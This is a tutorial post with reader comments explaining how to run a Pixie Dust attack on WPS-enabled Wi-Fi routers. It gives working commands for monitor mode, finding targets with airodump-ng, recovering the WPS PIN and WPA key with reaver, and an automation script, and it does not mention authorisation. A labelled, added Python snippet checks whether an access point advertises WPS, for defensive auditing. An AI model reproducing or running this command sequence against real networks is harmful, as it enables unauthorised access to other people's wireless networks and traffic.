Hacking WPS via Pixie Dust Attack

April 22, 2016 | Views: 63140


This Cybrary 0P3N submission will cover how to use tools such as the aircrack-ng suite, Reaver, Pixiewps, and HT-WPS#B to exploit a WPS vulnerability in certain routers.

This attack is carried out on a machine running Kali Linux. (Kali comes pre-packaged with the mentioned tools, aside from HT-WPS#B.)

Here is a list of vulnerable routers:
Spreadsheet of Routers Vulnerable to WPS Exploit

To start, open a terminal as root and run the following commands.


apt-get update

apt-get install reaver aircrack-ng


Once you have run the above commands, we will use airmon-ng to put our wireless card into monitor mode. (You must have a wireless card capable of packet injection.)

First we will check for any interfering processes by using the following command.


airmon-ng check


If processes were found, use the following command to kill them.


airmon-ng check kill


Now to set the card to monitor mode.


airmon-ng start wlan0


Next we will use airodump-ng to scan for wireless access points with WPS enabled.


airodump-ng wlan0mon --wps


Once airodump-ng has found the AP you are attacking, press Ctrl+C to stop, then copy down the BSSID and channel number.

Our next step is to use Reaver combined with Pixiewps mode to exploit the target AP.


reaver -i wlan0mon -c # -b XX:XX:XX:XX:XX:XX -k 1


-i specifies the interface used

-c specifies the channel of the AP. Replace # with the channel number.

-b specifies the BSSID of the AP. Replace XX:XX:XX:XX:XX:XX with the BSSID you copied down.

You can also time the reaver process by using the following command.


time reaver -i wlan0mon -c # -b XX:XX:XX:XX:XX:XX -k 1


If successful, the WPS PIN will be passed to Reaver and the WPA key will be discovered.
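Whether an access point you administer is exposed at all depends on whether its beacons advertise WPS, which is the field the `--wps` column of airodump-ng reports. The following is an added example, not part of the original post: it parses the WPS vendor element out of a beacon's tagged parameters and reports the WPS state and the AP Setup Locked flag. The function names are hypothetical and the sample bytes are constructed, not captured.

```python
import struct
WPS_OUI_TYPE = bytes.fromhex("0050f204")  # vendor OUI 00:50:F2, type 4 = WPS
ATTR_VERSION, ATTR_STATE, ATTR_LOCKED = 0x104A, 0x1044, 0x1057
STATE_NAMES = {1: "not configured", 2: "configured"}

def iter_tlv(buf, header, size):
    """Yield (type, value) pairs; stop at a truncated record instead of guessing."""
    pos = 0
    while pos + size <= len(buf):
        kind, length = struct.unpack_from(header, buf, pos)
        value = buf[pos + size : pos + size + length]
        if len(value) < length:
            return
        yield kind, value
        pos += size + length

def parse_wps(ies):
    """Return the WPS fields from a beacon's tagged parameters, or None if absent."""
    for eid, body in iter_tlv(ies, "BB", 2):          # 802.11 IEs: 1-byte id/len
        if eid != 221 or not body.startswith(WPS_OUI_TYPE):
            continue                                   # not the WPS vendor element
        attrs = dict(iter_tlv(body[4:], ">HH", 4))     # WPS attrs: 2-byte type/len
        first = lambda t: (attrs.get(t) or b"\x00")[0]
        return {
            "version": first(ATTR_VERSION),
            "state": STATE_NAMES.get(first(ATTR_STATE), "unknown"),
            "locked": first(ATTR_LOCKED) == 1,
        }
    return None

def audit(name, ies):
    """One-line finding for an AP you administer (hypothetical helper)."""
    wps = parse_wps(ies)
    if wps is None:
        return f"{name}: WPS not advertised"
    return f"{name}: WPS advertised ({wps['state']}, locked={wps['locked']})"

# Constructed samples (not captured traffic): SSID "lab-ap" plus further elements.
SAMPLE_WPS = bytes.fromhex(
    "00066c61622d6170"    # SSID element: id 0, len 6
    "dd130050f204"        # vendor element, len 19, WPS OUI/type
    "104a000110"          # Version = 0x10
    "1044000102"          # WPS State = 2 (configured)
    "1057000101"          # AP Setup Locked = 1
)
SAMPLE_NO_WPS = bytes.fromhex("00066c61622d6170" "dd070050f202010100")  # WMM only
if __name__ == "__main__":
    print(audit("lab-ap", SAMPLE_WPS))
    print(audit("lab-ap-2", SAMPLE_NO_WPS))
```

An AP that reports "WPS not advertised" after WPS has been disabled in its settings no longer offers the PIN exchange that Reaver depends on.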


Once you have followed the above steps and are comfortable with the process, I suggest using HT-WPS#B to automate the entire process.


Using HT-WPS-Breaker to automate the process.

To install, CLICK HERE then drag the .zip to your desktop and run the following commands.

  • cd Desktop
  • unzip HT-WPS-Breaker-master.zip
  • cd HT-WPS-Breaker-master
  • chmod +x HT-WB.sh
  • ./HT-WB.sh or bash HT-WB.sh


This concludes a simple write-up of how to use Reaver and other tools to attack a WPS-enabled AP.

I have had many questions on how to use Reaver so I hope this helps.

Comment below if you have any questions. (Please keep comments in regards to the topic).


  1. Hi everybody!

    I created a Kali live USB with persistence just a few days ago and tried the above commands. When I used apt-get install reaver aircrack-ng, a message appeared suggesting that reaver is already installed. Is that normal due to an updated Kali version?

  2. Was expecting something good from the post.
    I'm a little disappointed.

    I was thinking this post will explain how the pixie dust attack actually works.

  3. How do you know if your wireless card is capable of packet injection? Do most wireless cards do this natively or do I need to purchase one that does?

  4. Will try this out this weekend.

  5. Is it possible to realize this process in windows 10?

    • Use a Unix-based distro. A virtual machine works great as well. If you are using a USB wireless card, I highly suggest dual booting, as you may run into problems with injection and/or drivers.
